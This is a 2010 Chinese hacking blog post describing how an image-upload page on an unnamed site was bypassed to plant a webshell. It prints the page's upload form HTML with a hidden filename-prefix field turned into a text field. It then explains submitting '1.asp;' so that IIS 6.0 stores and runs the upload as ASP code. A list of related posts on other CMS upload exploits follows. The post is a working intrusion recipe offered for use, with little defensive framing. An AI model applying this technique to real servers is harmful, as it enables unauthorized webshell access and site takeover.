上传漏洞hidden to text 突破手记

2010, April 3, 9:17 PM. 漏洞分析
Submitted by admin

本文是由一个上传的页面突破上传引发的,话说当时群里议论纷纷。发出XXX网站的上传地址,研究过来研究过去。没找到突破,本地修改上传提交仍然不能突破。

就在当时,小三毛同志提出修改hidden to text利用IIS漏洞可取webshell。咱也试下这招数如何

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<LINK href="../css/css.css" rel=stylesheet type=text/css>
<title>上传图片</title>
</head>

<body leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td height="20" align="center">
     
    </td>
  </tr>
</table>
<table width="90%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#999999">
  <form action="http://xxx.net/inn/upfilesave.asp" method="post" enctype="multipart/form-data">

    <tr>
    <td bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0">
        <tr>
            <td height="25" bgcolor="#CCCCCC" class="td_14">上传图片</td>
        </tr>
      </table></td>
  </tr> 
  <tr>
      <td height="35" align="center" bgcolor="#FFFFFF">
        <input name="image" type="file" id="image">
      </td>
  </tr>
  <tr>
      <td height="35" align="center" bgcolor="#FFFFFF">
        <input type="submit" name="Submit" value="提交" onClick="checkImage('image')">
        <input name="PathFolder" type="hidden" id="PathFolder" value="/img/trade/">
        <input name="FormName" type="hidden" id="FormName" value="add">
        <input name="parent" type="hidden" id="parent" value="img">
        <input name="Filename_Pre" type="text" id="Filename_Pre" value=""> 
        <input name="Create" type="hidden" id="Create" value="">
        <input type="reset" name="Submit2" value="关闭" onClick="javascript:window.close()">
      </td>
  </tr>
  </form>
</table>
</body>
</html>
<script language=javascript>
function checkImage(sId)
{
  if(( document.all[sId].value.indexOf(".asp") == -1) && (document.all[sId].value.indexOf(".asa") == -1)) {
    //alert("请选择gif或jpg的图象文件");
   // event.returnValue = false;
    }
}
</script>
 

保存为HTML。。。

原来

  <input name="Filename_Pre" type="hidden" id="Filename_Pre" value=""> 
       

修改

  <input name="Filename_Pre" type="text" id="Filename_Pre" value=""> 

 

打开本地HTML提交页,上传时填充1.asp;。

 

成功返回1.asp;_201036165716.jpg。IIS 6.0,成功运行小马~

Tags: 上传

« 上一篇 | 下一篇 »

只显示10条记录相关文章
分享网络商城购物系统v3.0全功能版 上传漏洞 (浏览: 15060, 评论: 0)
upfile 又一奇迹般的突破 (浏览: 8135, 评论: 0)
无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞 (浏览: 9955, 评论: 0)
无忧购物系统ASP时尚版上传漏洞 (浏览: 9897, 评论: 0)
深度学习asp整站系统oday (浏览: 8455, 评论: 0)
微尔文章系统v1.51 (修正版)上传漏洞 (浏览: 10469, 评论: 0)
Es_Cms上传漏洞利用 (浏览: 9244, 评论: 0)
良精微博系统上传漏洞 (浏览: 12502, 评论: 0)
尘月网络企业网站管理系统2010生成HTML专业版之上传漏洞 (浏览: 11497, 评论: 0)
一个上传文件的分析笔记 (浏览: 10369, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):